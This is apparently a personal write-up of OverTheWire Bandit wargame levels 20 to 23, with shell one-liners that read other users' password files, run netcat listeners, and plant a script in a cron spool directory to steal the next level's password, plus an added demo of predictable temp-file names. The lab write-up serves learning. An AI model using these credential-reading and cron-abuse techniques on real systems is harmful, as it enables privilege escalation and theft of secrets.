2025-04-01

overthewire

level 20

you need to create a tcp server that sends a password. that password must be equal to bandit20’s password

oh i accidentally found someone’s solution on the server: ncat -e /bin/echo <bandit20 password> -k -l 10235

he should’ve used /bin/cat /etc/bandit_pass/bandit20.

but i like this solution more since it doesn’t depend on nmap:

ssh -t bandit20@bandit.labs.overthewire.org -p 2220 "nc -lp 6969 < /etc/bandit_pass/bandit20 & ./suconnect 6969 | grep -E '^[A-Za-z0-9]{32}\$'"

I had to use ^ and $ since i only want the line with the password

level 21

i am using fish shell, i like to do it like this.

i have my passwords saved on a file as well, but i won’t be making it public.

the goal is to read the script of a cronjob and find the flag in a temp directory.

the path of the flag is hardcoded.

export LEVEL=21; ssh -t bandit$LEVEL@bandit.labs.overthewire.org -p 2220 "awk '/* bandit22/ {print \$7}' /etc/cron.d/cronjob_bandit22 | xargs awk '/cat/ {print \$4}' | xargs cat | grep -Eo '[A-Za-z0-9]{32}'"

level 22

this level is the same as level 21 except it’s using a weak form of obscurity: the file name is the md5 hash of a sentence.

export LEVEL=22; cat level(math $LEVEL - 1); ssh -t bandit$LEVEL@bandit.labs.overthewire.org -p 2220 "cat /tmp/\$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)"
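
the "weak form of obscurity" point above, as an added example (not from the original post and not the server's own script): a file name derived only from the user name can be recomputed by anyone, while mktemp gives a random name and mode 0600. the function names, the sample user and the sample secret are constructed for illustration.

```sh
#!/bin/sh
# Added example. Function names, the sample user and the sample secret are
# constructed for illustration; none of this is the server's own script.

# Weak: the file name is a pure function of a public value (the user name),
# the same derivation as the one-liner above. Anyone can recompute it.
predictable_name() {
    echo "I am user $1" | md5sum | cut -d ' ' -f 1
}

# Writes a secret the weak way: guessable name, default permissions.
write_secret_predictable() {  # args: dir user secret
    printf '%s\n' "$3" > "$1/$(predictable_name "$2")"
}

# Hardened: mktemp picks a random name and creates the file with mode 0600,
# so the path cannot be derived and other users cannot read it anyway.
write_secret_private() {  # args: dir secret; prints the path it created
    f=$(mktemp "$1/secret.XXXXXXXXXX") || return 1
    printf '%s\n' "$2" > "$f"
    echo "$f"
}

# Audit check: succeeds if a file sits at the derivable path for this user.
is_guessable() {  # args: dir user
    [ -f "$1/$(predictable_name "$2")" ]
}

# Permission string of a file, e.g. -rw-------
file_mode() {
    ls -ld "$1" | cut -c1-10
}

# Demo in a throwaway directory with a constructed secret.
demo() {
    d=$(mktemp -d) || return 1
    write_secret_predictable "$d" bandit23 "constructed-secret"
    p=$(write_secret_private "$d" "constructed-secret")
    is_guessable "$d" bandit23 && echo "weak:     found at $d/$(predictable_name bandit23)"
    echo "hardened: $p ($(file_mode "$p"))"
    rm -rf "$d"
}
demo
```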

level 23

i stole someone’s terminal commands lmao

stty raw -ctlecho -echo; cd /home/bandit23 >/dev/null 2>&1; if [ $(date +%S) -lt 3 ]; then sleep 2; fi; s=$(mktemp --tmpdir=/var/spool/bandit24/foo); t=$(mktemp); b='!'; chmod 777 $t; echo -e "#$b/bin/sh\ncat /etc/bandit_pass/bandit24 > $t" > $s; chmod 777 $s; sleep 60; cat $t; rm -f $t

just to make my automation script work.

although using netcat already works as is, with python’s paramiko it’s 50/50

here are the modified stolen commands:

export LEVEL=23; cat level(math $LEVEL - 1); ssh -t bandit$LEVEL@bandit.labs.overthewire.org -p 2220 's=$(mktemp --tmpdir=/var/spool/bandit24/foo); t=$(mktemp); chmod 777 $t; echo -e "cat /etc/bandit_pass/bandit24 > $t" > $s; chmod 777 $s; while [[ ! -s "$t" ]]; do sleep 1; done; cat $t | grep -Eo \'[A-Za-z0-9]{32}\''

mktemp --tmpdir is needed to set the proper permissions, otherwise using chmod will just cause an error.

i used a while loop so that there won’t be a reason to wait 60s